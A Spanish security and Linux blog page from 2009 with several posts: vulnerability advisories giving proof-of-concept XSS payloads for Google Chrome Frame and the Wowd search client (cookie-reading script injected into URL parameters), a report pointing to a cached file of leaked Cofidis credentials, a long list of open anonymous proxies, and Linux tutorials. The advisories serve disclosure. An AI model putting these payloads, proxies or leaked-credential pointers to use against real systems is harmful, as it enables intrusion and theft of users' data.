Arrancando Chrome OS desde una memoria USB

26 noviembre 2009 Publicado por cLimbo 0 comentarios
De esas cosas que cuentas los días para que suceda: alguien llamado Hexxeh ha logrado adaptar un build de Chrome OS (Chromium) para que arranque y funcione desde una memoria USB.

Las instrucciones para lograrlo son lo suficientemente sencillas (Windows, Mac OS X, Linux). La imagen del sistema operativo puede ser descargado vía BitTorrent (por ejemplo)

…y mientras estamos descargando/instalando, podemos ver el video que los chicos de Engadget han hecho mostrando la velocidad del sistema operativo, que sinceramente sorprende bastante.




Vía | ALT1040

Google Chrome Frame null domain XSS

20 noviembre 2009 Publicado por cLimbo 0 comentarios
#####################################
Google Chrome Frame null domain XSS
URL afectada: http://www.google.com/chromeframe
Changelog del vendedor: http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html
Reportado por: http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html
Notificación al vendedor: Exploit disponible:
######################################

######################
Descripción del vendedor
######################

Google Chrome Frame es un plug-in gratuito para Internet Explorer. Algunas aplicaciones web avanzadas, como Google Wave, contiene el uso de Google Chrome Frame para ofrecerle características adicionales y un mejor rendimiento.

Google Chrome Frame es una etapa inicial de código abierto, un plug-in que hace a la perfección Google Chrome mejorando las tecnologías web y el motor de JavaScript de Internet Explorer.

################
Versiones afectadas
################

4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3

Versiones no afectadas:

4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5

Para más información visiten:
http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html

#####################
Cross Site Scripting
#####################

Creamos un documento HTML para probar y metemos =>

<iframe src="javascript:alert(1)></iframe>

=> se abre el iframe y ejecuta el alert (esto es lo correcto)

<iframe src="cf:javascript:alert(1)></iframe>

=> esto no funciona, no muestra el alert (sigue siendo correcto)

Y aquí está el error:

<iframe src="cf:view-source:javascript:alert(1)></iframe>

Este code ejecuta y muestra el alert que funciona en local y a su vez en remoto o también a través de la barra de dirección.

Esto pasa las políticas de origen de datos !!

Para probar el navegador Google Chrome ponemos en la barra de dirección =>

view-source:javascript:alert(1)

Esto ejecuta el alert, aun así Google hace poco decidió realizar unos cambios en él como poner la página en blanco, este tema es sólo explotable a través de la barra de direcciones, no en un iframe o frame o documento html, así que por ese motivo creo que este problema no es explotable remotamente.

###########
Crashes
###########

cf:view-source:about@: => se rompe
cf:about@: => rompe el tab

##########
Solución
############

Google automáticamente ha sacado una nueva versión de Chrome Frame 4.0.245.1 (Official Build 31970) y esta versión no está afectada por esta vulnerabilidad.

#################€nd#############
Etiquetas: , ,

Ksplice: aplica parches de seguridad sin necesidad de reiniciar

29 octubre 2009 Publicado por cLimbo 0 comentarios
Cuando aplicamos una actualización a un sistema GNU/Linux, por lo general, no es necesario reiniciar el equipo. Por supuesto hay excepciones, y una muy frecuente son las actualizaciones al núcleo Linux.


Ksplice es una herramienta que nos permite aplicar parches de seguridad a Linux sin necesidad de reiniciar el sistema. Es un aliado ideal para servidores, donde posponer una actualización puede suponer un grave problema de seguridad, y un reinicio un más que molesto inconveniente. Eso sí, hay que tener presentes algunos puntos muy importantes…

El primero, que Ksplice no reemplaza a las actualizaciones de nuestra distribución, únicamente aplica parches al núcleo y a los módulos que ya está cargados en memoria. Es ideal para aplicar parches de seguridad casi inmediatos, pero no sirve para actualizar a nuevas versiones del núcleo.

Además, las actualizaciones que provee Ksplice no las controla vuestra distribución, sino Ksplice, Inc, la empresa que está detrás del programa. Supone un plus de fe que algunos pueden no querer asumir.

Por último, pero no por ello menos importante: por ahora solo está disponible para las últimas versiones de Ubuntu. Para el resto de distribuciones deberás ponerte en contacto con ellos –y no dejan muy claro el motivo exacto.

Tenéis más información en su página oficial, donde además tienen una sección de preguntas frecuentes bastante completa y un panfleto técnico.

Vía | Bitelia

Wowd search client multiple variable XSS

27 octubre 2009 Publicado por cLimbo 0 comentarios
##########################################
Wowd search client multiple variable XSS
URL afectada: http://www.wowd.com/
Avisado por: http://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html
Notificación al vendedor: exploit disponible:
##########################################

################
¿Qué es Wowd?
################

Wowd es un motor de búsqueda que sirve para descubrir lo más popular de las webs en tiempo real.

En esencia, la compañía ha hecho un p2p como motor de búsqueda, por lo que otros usuarios Wowd que hay en línea pueden estudiar y usar sitios del ranking basada en una estructura de enlaces arcanos.

Teniendo una búsqueda y dividiéndola en millones de pequeñas piezas todas ellas dirigidas por los usuarios individuales que han descargado el cliente Wowd cambia completamente la operación - y la economía - del motor de búsqueda. Cuantas más veces clicken dentro de Wowd en un enlace dentro de un tiempo "x" el ranking será más alto ya que es mayor el vínculo.

##########################
Descripción de la vulnerabilidad
##########################

El cliente Wowd contiene un error que permite a ejecutar un codigo remoto cross site scripting (XSS). Este error existe porque la aplicación no es valida en el cuadro de diálogo URI '' SortBy 'tags' y 'variables CTX' en envio a script 'index.html'. Esto podría permitir a un usuario crear especialmente un código a través de una dirección URL que ejecutaría arbitrariamente en el navegador de un usuario dentro de la relación de confianza entre el navegador y el servidor, esto produciría una pérdida de integridad.

Este problema puede ser peligroso, porque si se está ejecutando el cliente Wowd, usted tiene esta vulnerabilidad, porque este problema puede ser aprovechado en todos los navegadores, hasta en IE8 con el filtro anti-XSS (WoW!)

#################
Versiones
################·

Wowd client 1.3.0

#################
SOLUCIÓN
#################

No hay solución por el momento !!!

###################
PoC
###################

#############
Prueba
#############
Puedo probar en IE8, Firefox 3.5.3 y Safari 4



En todos los casos que el XSS se ejecuta incluso a IE8 con anti-XSS :D

un usuario remoto puede redactar un documento html con un iframe y esta fuente para el iframe:

http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
el navegador ejecuta el XSS, y se accede directamente a esta dirección URL:



de forma adicional Wowd puede mostrar sus resultados, ya que tenemos una funcionalidad para agregar "etiquetas" a una dirección URL.

Ejemplo:


http://localhost:8101/wowd/index.html?search&query=a&
sortby=rank&tags=english|S0B0707656E676C6973680D02

Esto muestra una búsqueda indexada con la etiqueta 'english', se puede añadir una etiqueta diseñada por tí mismo que permita la ejecución de un XSS como: [tag]|[token]

ejemplo:

http://localhost:8101/wowd/index.html?search&query=a
&sortby=rank&tags=english|S0B0707656E676C6973680D02,
%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02
y se ejecuta el XSS en las etiquetas de las etiquetas creadas



CTX se vé también variablemente afectado

http://localhost:8101/wowd/index.html?search&page=2&q=
&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
--
atentamente:
Lostmon (lostmon@gmail.com)
--------
Browser: Internet Explorer 8 (Windows)
Browser: Firefox 3.5 (Windows)
Browser: Safari 4 (Windows)
----------

thz Lost ;-)


Cofidis.es pudo ver sus datos comprometidos

15 octubre 2009 Publicado por cLimbo 0 comentarios
###########################################
Cofidis.es pudo ver sus datos comprometidos
Afectado: www.cofidis.es
Falla: cedenciales criticas al descubierto
###########################################

Cofidis es una empresa formada por varios grupos de crédito que agrupan diferentes servicios dentro del panorama de finanzas mundiales.

La definición según podemos leer en su web:

"Somos líderes europeos del crédito por teléfono: tenemos más de 8 millones de clientes. En España, Ya contamos con más de 15 años de experiencia y un equipo de más de 800 colaboradores."

Cofidis.es pudo verse afectado por un fallo atraves del cual podrían terceras personas haber podido tener acceso
a datos de carácter personal, al haber dejado al descubierto las credenciales de acceso root al portal y así mismo al dejar al descubierto las credenciales de acceso a la base de datos del portal.

Para hacernos una idea de qué tipo de datos pueden haber sido vistos o "robados" por terceros, tan solo debemos mirar uno de los formularios de solicitud de crédito, y por los datos que se nos piden se puede saber qué tipo de datos podría contener la base de datos.

https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do

Esta noticia Llego a mí, después observar un post en Twitter en el cual se daba una url del portal Cofidis.es y el acceso
a un txt sin ningún tipo de protección, y el cual contenía las credenciales antes mencionadas.

Después de observar esta situación, y hablado con algunos de los miembros del grupo de discusión e investigación, decidimos mirar desde cuando podía haberse dado esta circunstancia y el posible origen de la noticia. Haciendo una búsqueda rápida en los motores de búsqueda habituales Llegamos a un Post en twitter del día 12-10-2009.

1

Y uno posterior del día 13-10-2009.

2

Y otro mas el dia 13-10-2009.

3

El día 14-10-2009 por la tarde el txt que contenía estascredenciales fue retirado del raíz del portal cofidis.es
Con lo cual se puede pensar que esos datos tan sensibles pudieron estar al alcance de todo el mundo durante al
menos tres días.

Google muestra en su cache, una imagen de dicho documento con fecha Del día 13-10-2009 mostrando las credenciales:

http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/cofidis.txt+http://www.cofidis.es/cofidis.txt&cd=8&hl=es&ct=clnk&gl=es

4

Pero esta sería la fecha en la cual google tomo esa instantánea de ese documento, pudiendo haber reemplazado a una anterior a eso, los logs del servidor de cofidis deberían mostrar cuando fue la primera vez que el spider de google pudo rastrear ese txt.

Así mismo si realizamos una búsqueda en google por el fichero txt entre los resultados primeros puede apreciarse que Google también revela esas credenciales faltaría saber cuando fue incluido en la Indexación ese archivo, para intentar averiguar desde que fecha se pudo haberse producido esta situación.

http://www.google.es/search?q=cofidis.txt

5

Como pudo Un administrador dejar deliberadamente un archivo con información tan sensible a la vista de cualquier visitante, se preguntara más de uno.

Seguramente el admin no sabía nada de la existencia de ese fichero, o eso creemos o queremos creer) Debió ser un hackeo , por el tipo de fichero generado y su disposición y los datos que contiene podría haberse tratado de algún agujero de seguridad en la web , a traves del cual el atacante hubiese podido incluir algún archivo externo
( esta vulnerabilidad es conocida como RFI (o remote file include) pues hay algunos scripts de los que corren por la red, que justamente hacen eso y mirando su fuente se puede observar que justamente sacan esos datos de la maquina o inyectan una Shell en php.

Creo que cofidis debería dar explicaciones de este hecho y así mismo debería verse como le afecta este acontecimiento a cofidis, ante la LOPD y que datos han sido comprometidos, no por mi porque por suerte yo no me encuentro en su base de datos que yo sepa, pues nunca necesite sus servicios.

Desde el grupo de investigación y desarrollo de Lostmon's Groups queremos hacer un llamamiento a que las empresas como cofidis y otras que trabajan con datos personales tan sensibles y de tanta confidencialidad, deberían invertir parte de sus beneficios en asegurar que esos datos no estarán accesibles y deberían hacer lo posible por protegerlos como se les pide en la LOPD.

Bien es cierto que en seguridad, no hay nada seguro, o que lo bonito de la seguridad es la inseguridad que trae por si
misma. Y bien es cierto que por mucho que los administradores pongan énfasis y empeño en asegurar servicios y sistemas, siempre hay gente, que va por delante de ellos.

Este analisis ha sido realizado por cLimbo y por Lostmon

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Así hace Nokia para probar todos sus móviles

08 octubre 2009 Publicado por cLimbo 0 comentarios
Es notable la cantidad de "meneos" que le dan, atención al vídeo;

IE8 Save as Title Bug

17 septiembre 2009 Publicado por cLimbo 0 comentarios
IE8 tiene un pequeño "bug", permite denegar la función "guardar como" si el documento html tiene un título largo.

De forma predeterminada cuando un usuario intenta hacer click en "guardar como" el navegador utiliza el título del HTML como el nombre del archivo para guardarlo, pero si este título es muy largo, el explorador da un error porque no puede guardar este archivo.

Internet Explorer no guarda los archivos que en el nombre contienen más de 261 caracteres, ya que el Explorador da un aviso con un error de que el archivo no se puede guardar.

Creo que esto no tiene implicación alguna en la seguridad, le envié un mail a MSRC comentándoles la cuestión y ellos piensan lo mismo.

Respuesta de MSRC:

"De acuerdo con su apreciación de que este no parece ser una cuestión de seguridad, puede ser un error y informaré para que lo tengan en cuenta en un futuro al sacar una no-actualización de seguridad"

Aquí tenéis el PoC de este "bug", es muy simple;

<HTML>
<TITLE>A*261 chars</TITLE>
<HTML>

###########End #################

thank to all Lostmon groups team
Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

-----------

thz Lost ;-)

Proxies HTTP Anónimos 11-09-09

11 septiembre 2009 Publicado por cLimbo 0 comentarios
70.236.32.186:58808
60.12.190.58:8088
221.204.253.154:8088
212.62.97.23:8080
222.247.62.195:8080
118.98.160.102:8080
212.62.110.20:8080
218.26.204.66:8080
218.56.64.210:8080
200.43.141.173:8080
75.72.78.111:6000
118.98.176.130:3128
200.56.86.165:3128
124.237.86.10:3128
148.233.239.23:3128
201.144.213.18:3128
218.14.227.197:3128
91.92.165.253:3128
219.93.175.67:3128
119.62.128.38:80
212.113.5.2:80
119.62.128.47:80
208.100.40.34:80
61.135.179.52:80
212.62.97.20:80
213.203.241.210:80
202.115.194.78:808
90.182.58.186:3128
119.119.50.252:8088
213.174.145.178:3128
123.4.131.242:9000
58.18.157.11:9000
115.96.38.49:6588
123.125.156.132:80
133.1.74.163:68664
85.130.19.56:808
200.104.47.246:80
201.43.154.203:9000
123.237.191.138:6588
60.220.47.69:9000
123.4.124.166:9000
114.241.183.7:808
89.112.28.74:8080
121.67.120.36:808
125.110.14.222:80
61.63.102.34:9000
211.138.124.232:80
164.78.252.25:80
174.142.24.201:3128
195.229.177.28:80
196.213.93.19:8080
202.3.219.16:80
203.147.4.68:8080
217.31.51.76:443
218.16.123.221:808
218.56.64.211:8080
74.206.98.202:8080
114.127.246.36:8080
117.32.251.246:80
118.98.232.202:8080
121.168.247.65:3128
121.204.0.2:80
121.243.34.24:8080
121.28.34.69:8088
122.128.100.21:8080
165.98.133.234:8080
174.142.104.57:3128
190.102.206.48:8080
190.14.254.162:80
190.146.244.52:80
190.27.205.81:8080
193.109.167.174:3128
193.171.32.6:80
193.231.72.8:80
194.100.9.12:80
195.154.158.18:80
195.229.62.157:80
200.31.42.3:80
201.17.162.45:8080
201.206.168.86:80
201.225.226.68:8080
201.83.221.229:8080
202.116.160.89:80
202.131.98.165:80
202.188.222.2:8080
202.54.61.99:8080
202.99.29.27:80
203.177.60.222:8080
210.212.172.220:80
210.212.216.228:8080
211.136.86.204:8085
211.166.8.79:80
213.123.61.66:80
213.60.35.92:80
216.230.72.76:8080
217.31.51.77:443
218.182.134.23:8080
218.24.180.12:80
218.56.64.210:8080
218.64.88.30:8080
218.97.194.94:80
219.150.144.58:80
219.239.11.182:80
220.128.122.187:80
221.204.253.154:8088
221.212.177.97:1080
221.214.27.252:808
222.73.228.7:80
24.47.185.44:8085
41.210.252.11:8080
59.162.33.158:8080
59.36.98.154:80
60.251.136.26:80
61.134.60.254:808
61.167.117.83:8080
61.86.36.2:8080
66.135.42.52:8080
66.166.1.181:8000
66.167.100.59:6649
68.61.70.255:8085
81.0.254.172:80
81.18.116.70:8080
83.18.28.130:3128
87.117.186.88:3128
87.98.218.53:80
89.165.40.10:8080
89.212.135.232:9090
110.172.167.34:8080
113.6.255.107:80
114.127.246.36:80
114.128.3.51:80
116.68.172.35:8080
117.103.51.116:8080
117.240.40.9:808
118.220.175.207:80
118.96.132.49:8080
118.96.148.224:8080
118.96.152.21:8080
118.96.152.8:8080
118.96.84.171:8080
118.98.160.53:8080
118.98.214.170:8080
118.98.232.202:8080
119.63.86.78:80
119.82.242.35:8080
120.118.254.248:80
120.138.117.249:8080
122.126.67.146:9000
122.128.100.21:8080
122.155.3.45:8080
122.200.52.124:80
122.200.52.149:80
122.205.95.14:80
123.10.134.35:9000
123.124.217.89:8001
123.202.229.121:9000
123.215.198.135:8080
123.233.121.164:80
123.4.66.141:9000
124.124.19.3:80
124.128.61.251:8080
124.13.218.26:9000
124.193.174.188:80
124.195.13.210:8080
124.244.251.180:808
124.40.121.3:80
125.160.131.127:8080
125.163.205.181:8080
125.163.240.148:8080
125.163.248.16:8080
125.165.119.132:80
125.165.48.74:8080
125.167.78.84:8080
125.46.95.230:80
125.60.242.5:8080
130.208.87.145:80
140.247.60.128:443
148.208.238.7:80
150.7.49.7:8080
162.39.225.78:8000
164.77.170.67:8080
164.78.252.25:80
165.98.133.234:8080
174.49.93.138:80
186.56.68.2:8080
187.21.99.200:6588
187.5.65.191:80
187.6.209.146:80
187.6.253.250:80
189.122.197.251:8080
189.122.2.124:6588
189.126.51.163:80
189.29.64.237:6588
189.31.189.16:80
189.50.116.113:8080
189.73.114.115:8080
189.73.221.191:8080
190.128.225.182:8080
190.139.105.99:8080
190.14.254.162:80
190.152.220.90:80
190.184.70.237:8080
190.196.4.52:8080
190.201.226.183:9000
190.202.110.210:8080
190.228.118.130:80
190.27.205.81:8080
190.27.218.105:8080
190.4.12.186:8080
190.41.96.60:8080
190.72.166.177:8080
190.95.162.220:80
190.97.144.194:6588
192.107.168.129:80
192.118.96.28:80
192.18.102.59:443
193.43.93.183:80
194.100.9.12:80
195.154.158.18:80
195.187.142.241:80
195.198.4.78:80
195.207.15.79:331
195.219.143.82:80
195.24.140.123:331
195.242.99.192:80
195.242.99.89:80
195.242.99.91:80
195.83.252.124:80
196.201.19.174:80
196.202.116.18:8080
196.202.50.194:8080
196.202.83.200:8080
196.213.191.180:8080
196.219.18.34:8080
196.219.188.94:80
196.219.213.67:8080
196.221.149.12:80
199.193.10.202:80
200.110.169.94:80
200.158.124.241:8080
200.163.50.130:80
200.205.87.106:8081
200.21.232.130:8080
200.242.55.7:8080
200.30.101.109:8080
200.30.101.114:8080
200.30.101.118:8080
200.30.101.2:8080
200.30.101.20:8080
200.30.101.75:8080
200.45.113.254:8080
200.45.199.129:8080
200.45.224.115:8080
200.45.224.116:8080
200.63.17.162:8080
200.65.129.2:80
201.15.46.77:8080
201.17.162.45:8080
201.253.123.67:8080
201.38.221.157:8080
201.43.154.203:9000
201.49.225.17:80
201.68.180.181:9000
201.68.28.38:8080
201.88.205.180:8080
201.91.59.125:6588
202.123.231.123:8080
202.129.187.125:8080
202.129.49.234:8080
202.133.60.85:8080
202.143.157.179:80
202.143.173.172:80
202.147.193.210:8080
202.148.20.84:8080
202.149.123.18:80
202.152.59.235:8080
202.153.41.134:8080
202.153.41.211:8080
202.164.211.75:8080
202.169.224.101:8080
202.239.242.75:8080
202.29.15.37:80
202.3.217.125:80
202.44.4.85:8081
202.47.71.77:8080
202.69.42.106:8080
202.75.27.246:8080
202.94.198.133:8080
202.99.29.27:80
203.160.1.103:80
203.160.1.112:80
203.160.1.66:80
203.160.1.75:80
203.162.112.62:80
203.172.138.210:80
203.172.160.242:80
203.172.216.141:80
203.187.212.36:6588
203.190.45.236:8080
203.218.167.49:808
203.45.118.138:9000
203.67.172.47:8080
207.134.113.227:9090
207.99.23.198:80
208.67.195.32:80
208.96.213.149:80
209.20.82.228:80
209.47.251.243:80
209.97.13.92:80
210.128.68.39:8080
210.212.20.131:80
210.212.20.132:80
210.212.216.228:8080
210.51.184.62:80
210.57.218.2:8080
211.138.124.232:80
211.141.14.10:808
212.1.95.50:8080
212.117.166.26:8136
212.14.38.95:80
212.243.183.5:8080
212.44.145.21:80
213.174.134.63:80
213.255.229.207:80
216.88.181.193:80
217.218.98.13:80
217.219.201.29:8080
217.219.207.227:8080
217.219.207.230:8080
217.66.208.4:8080
217.70.56.161:8080
217.91.66.222:80
218.17.5.151:80
218.24.180.12:80
218.242.239.61:8080
218.249.83.87:8080
218.25.23.98:80
218.50.52.210:80
218.56.64.2:80
218.56.64.210:8080
218.56.64.213:8080
218.90.171.249:8080
218.97.194.94:80
219.141.127.239:443
219.150.144.58:80
219.8.4.108:1080
220.128.189.35:80
220.213.229.69:80
220.225.130.18:80
220.40.60.59:8080
220.70.2.137:8080
221.18.4.186:8080
221.207.12.145:8080
221.214.102.99:80
221.214.48.125:80
222.127.147.83:8080
222.167.144.10:9000
222.197.173.209:808
222.66.116.108:8080
222.66.116.109:8080
222.66.154.206:8080
222.68.207.11:80
222.76.212.17:808
24.98.119.34:9090
58.176.56.189:9090
58.221.41.86:80
58.222.8.11:808
58.24.62.185:8088
58.240.237.32:80
58.245.235.205:9000
58.246.198.46:8080
58.4.70.106:8080
58.68.6.75:8080
59.152.89.42:8080
59.162.33.158:8080
59.36.98.154:80
59.95.176.110:6588
60.10.214.117:9000
60.191.246.17:8080
60.223.104.210:9000
61.134.43.24:808
61.138.124.242:80
61.15.40.37:808
61.19.213.83:8080
61.49.49.185:80
61.63.102.34:9000
61.90.197.58:80
62.213.87.20:80
64.151.79.246:9090
64.207.224.70:7212
64.247.18.122:80
64.71.138.70:8000
64.76.22.100:8080
64.76.22.104:8080
64.76.22.107:8080
64.76.22.108:8080
64.76.22.109:8080
64.76.22.110:8080
64.76.22.114:8080
64.76.22.115:8080
64.76.22.117:8080
64.76.22.118:8080
64.76.22.123:8080
64.76.22.124:8080
66.119.43.34:80
66.128.128.56:80
66.135.42.52:8080
66.148.112.108:80
66.167.100.59:6649
66.199.247.42:6649
66.90.237.241:8080
66.90.251.12:8080
67.15.104.28:80
67.228.12.165:80
67.69.254.240:80
67.69.254.244:80
67.69.254.245:80
67.69.254.247:80
67.69.254.248:80
67.69.254.250:80
67.69.254.251:80
67.69.254.253:80
67.69.254.254:80
67.69.254.255:80
68.191.252.234:80
68.40.13.194:9090
69.10.52.123:80
69.59.28.208:80
69.7.105.30:8080
69.90.107.184:80
70.161.238.250:8080
70.188.150.134:9090
71.197.199.228:8080
72.24.144.232:9090
72.9.104.3:80
74.206.98.202:8080
75.126.176.161:80
76.187.142.223:9090
76.215.111.69:9090
77.242.33.5:80
77.246.52.118:8080
77.41.140.70:80
77.77.68.150:80
77.87.124.102:8080
77.88.66.251:8000
78.154.132.241:8080
78.188.40.30:80
78.6.133.118:331
79.182.100.198:80
79.190.185.154:80
80.148.17.149:8080
80.148.22.116:80
80.148.23.25:80
80.148.24.6:8080
80.148.24.76:80
80.239.136.20:8080
80.88.242.32:9090
80.94.82.61:555
82.103.128.45:8080
82.115.28.134:8080
82.227.243.234:808
83.142.201.194:8080
83.161.199.75:80
83.218.188.208:8080
83.242.226.130:80
85.11.145.117:8080
85.115.20.76:8080
85.185.141.61:80
85.195.169.150:8080
86.101.185.112:8080
86.101.185.118:8080
86.101.185.97:8080
86.101.185.98:8080
87.120.58.79:8080
87.226.120.67:1111
87.98.162.222:80
87.98.218.53:80
88.191.63.27:8080
88.204.166.190:8080
88.208.219.155:8080
89.163.89.163:1111
89.165.40.10:8080
89.184.39.190:8080
89.212.253.19:8080
89.31.143.1:80
89.31.143.13:80
89.31.143.15:80
89.31.143.3:80
89.38.194.253:80
91.121.17.71:80
91.121.48.207:80
91.121.85.162:80
92.49.1.65:8080
93.62.4.207:80
95.64.110.141:8080
98.126.15.27:80
98.239.51.193:80
72.52.96.24:8080
202.143.143.35:80
125.160.131.127:8080
189.11.11.250:3128
194.165.141.106:8080
125.167.78.84:8080
218.103.42.27:80
222.255.0.27:8080
148.208.238.7:80
200.6.201.214:8080
121.246.78.245:3128
201.15.46.77:8080
118.96.110.41:3128
124.107.85.117:3128
72.213.135.222:9000
118.96.206.124:8080
190.72.166.177:8080
221.224.42.162:8080
203.172.216.141:80
79.190.185.154:80
Etiquetas: , , ,

BleachBit, limpia tu sistema de archivos innecesarios

03 septiembre 2009 Publicado por cLimbo 1 comentarios
BleachBit es una herramienta que analiza elementos de nuestros programas como cachés, historiales, cookies o archivos temporales para poder eliminarlos y así conseguir más espacio.


BleachBit es compatible con programas de Linux tan usados como Bash, Beagle, Epiphany, Firefox, Flash, Java, KDE, OpenOffice.org, Opera, RealPlayer, rpmbuild, VIM o XChat, con la posibilidad de buscar y borrar todos los ítems o seleccionar unos pocos.

BleachBit es una herramienta útil tanto para borrar archivos innecesarios, como para no dejar rastro de nuestras huellas en el PC.

Licencia: Gratuita (GPL)
Descarga: BleachBit

Remastersys, crea Backups y LiveCD de tu disco fácilmente

02 septiembre 2009 Publicado por cLimbo 0 comentarios
Remastersys es un programa, software libre/de código abierto para Linux distribución para crear un Live CD/DVD personalizado de Ubuntu o de sus derivados, y permite además hacer una copia de seguridad de todo un sistema, incluyendo los datos de usuario a un Live CD/DVD instalable.

La pega es que tiene ciertas limitaciones cito las mas importantes:

* Si usamos ATI o Nvidia, no cargan estos controladores por Ubuntu casper scripts y hay que iniciarlos manualmente.
* Limite de la imagen 4GB.

Para instalarlo añadimos el repositorio siguiente:

sudo -i
echo "deb http://www.remastersys.klikit-linux.com/repository remastersys/">>/etc/apt/sources.list

Ahora actualizamos los repositorios y lo instalamos:

sudo aptitude update
aptitude install remastersys

Si ejecutamos en una consola remastersys sin parámetros se nos presentara las posibilidades que disponemos, por ejemplo, para crear una copia de nuestro sistema en versión LiveCD haríamos:
sudo remastersys backup $USERNAME.iso

Esto se tirara un rato dependiendo de el tamaño del disco y la carga. AL finalizar tendremos la imagen en /home/remastersys/remastersys/$USERNAME.iso que podremos grabar a un CD/DVD directamente y sera funcional con las limitaciones que cite. Una vez grabada la imagen debemos de borrar los archivos temporales que estará en /home/remastersys:

sudo remastersys clean

Si queremos meter nuestra ISO en nuestro pendriver tendríamos que hacer lo siguiente:

Primero montamos la imagen en un destino conocido, por ejemplo /mnt/live:

sudo mkdir /mnt/live
sudo mount -t iso9660 /home/remastersys/remastersys/$USERNAME.iso /mnt/live -o ro,loop

Ahora metemos el pendriver y le formateamos a FAT si no lo estuviera teniendo en cuenta que los datos se van a borrar, suponiendo que el pendriver esta en /deb/sdb1:

sudo umount /dev/sdb1
sudo mkfs.vfat /dev/sdb1

Acto seguido lo montamos y copiamos el contenido de la ISO a esta:

sudo mkdir /media/disk
sudo mount /dev/sdb1 /media/disk
sudo cp -rf /mnt/live/* /media/disk
sudo mv /media/disk/isolinux/* /media/disk
sudo rm -r /media/disk/isolinux

Ahora le hacemos bootable para ello tenemos que instalar syslinux y parted:

sudo apt-get install syslinux parted

Marcamos la partición bootable y instalamos el gestor en la misma:

sudo umount /dev/sdb1
sudo parted /dev/sdb set 1 boot on
sudo syslinux /dev/sdb1
sudo umount /mnt/live

Ahora renombramos isolinux.cfg por syslinux.cfg:

sudo mount /dev/sdb1 /media/disk
sudo mv /media/disk/isolinux.cfg /media/disk/syslinux.cfg

Listo, ya tendremos nuestro pendriver listo para funcionar. Si queremos probar nuestro LiveCD podemos usar qemu algo como:

sudo qemu -hda /deb/sdb1

O directamente con la ISO:

sudo qemu -cdrom /home/remastersys/remastersys/$USERNAME.iso

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] Cómo aumentar el tamaño de la partición /home

Publicado por cLimbo 1 comentarios
Ya sabemos que en Linux la partición /home es donde se almacenan los diferentes perfiles de los usuarios y que conviene tener esta montada en una partición separada del / para que en futuras versiones no tengamos que definir todos los perfiles de nuestros programas de nuevo que de otra manera se formatearia.

El problema que me surgió es que definí la partición /home (/dev/sda2) muy pequeña de 2GB y me quede corto, la solución es simple, coger un trozo de espacio no usado de la partición / (/dev/sda1) y agregarla a la /home, esto hay que hacerlo con dichas particiones desmontadas ya que no nos dejara, por lo tanto necesitamos cualquier livecd, en mi caso opte por la de ubuntu jaunty desktop, pasos:




Ahora solo tenemos que seleccionar la primera opción "Probar Ubuntu sin alterar su equipo" y esperar unos segundos hasta que inicie el sistema.



Una vez que inicie ejecutamos una consola desde Aplicaciones/Accesorios/Terminal y ejecutamos el comando:

gksudo gparted


Nos saldrá una ventana con nuestras particiones, en mi caso 3, la / (dev/sda1), la /home (/dev/sda2) y la de intercambio (/dev/sda5):



Ahora lo que debemos de hacer es situarnos en la partición que queremos coger capacidad para dársela a la /home, en mi caso es la / (/dev/sda1), damos al secundario del ratón y le damos Redimensionar/mover, voy a mover 3GB, por lo tanto:



Ahora Muevo espacio a partir de la derecha, o sea "Espacio libre a continuación (MiB):" y le pongo el deseado, en mi caso 3000:



Doy al botón redimensionar. ahora hacemos lo mismo para la partición /home pero al contrario, o sea movemos de derecha a izquierda:




Damos al botón redimensionar, acto seguido damos al botón aplicar situado en la parte superior para que se aplique los cambios en el disco duro, esto tardara bastante tiempo según el tamaño que queramos mover.

Cuando acabemos ya tendremos modificado el tamaño de la partición /home. En este caso cogí espacio de la partición /, si fuera el caso que tendríamos una partición distinta a la / donde podemos coger datos no haría falta usar un livecd ya que podríamos hacerlo directamente pero antes desmontando la partición /home, para ello tendremos que salir de la sesión y iniciar como root, si fuera el caso:

umount /home


Acto seguido igual que hicimos anteriormente ... ejecutar como root:

gparted


Si no disponemos de gparted es tan fácil como instalarlo:

aptitude install gparted


Lo único que tenemos que tener en cuenta es que las particiones que vamos a modificar deben estar desmontada y también hay que tener en cuenta que si vamos a redimensionar una partición ntfs necesitamos ntfsprogs, al igual que si usamos ext* necesitamos e2fsprogs, reiserfsprogs para particiones reiser, hfsprogs para particiones hfs, etc...

Otra cosa importante, tener en cuenta que no es lo mismo redimensionar que mover, si redimensionas digamos no alteras el dispositivo, seguirá siendo /dev/sda2 por ejemplo, otra cosa es si mueves una partición ... puede cambiar los dispositivos y si es el caso deberemos tener en cuenta de hacer las modificaciones pertinentes en los archivos menu.lst y fstab para que concuerde con las nuevas particiones.

Un saludo

Artículo cedido por un conocido; chakal^-^.

[Tutorial] gtk-recordMyDesktop, grabando tu escritorio con sonido

30 agosto 2009 Publicado por cLimbo 3 comentarios

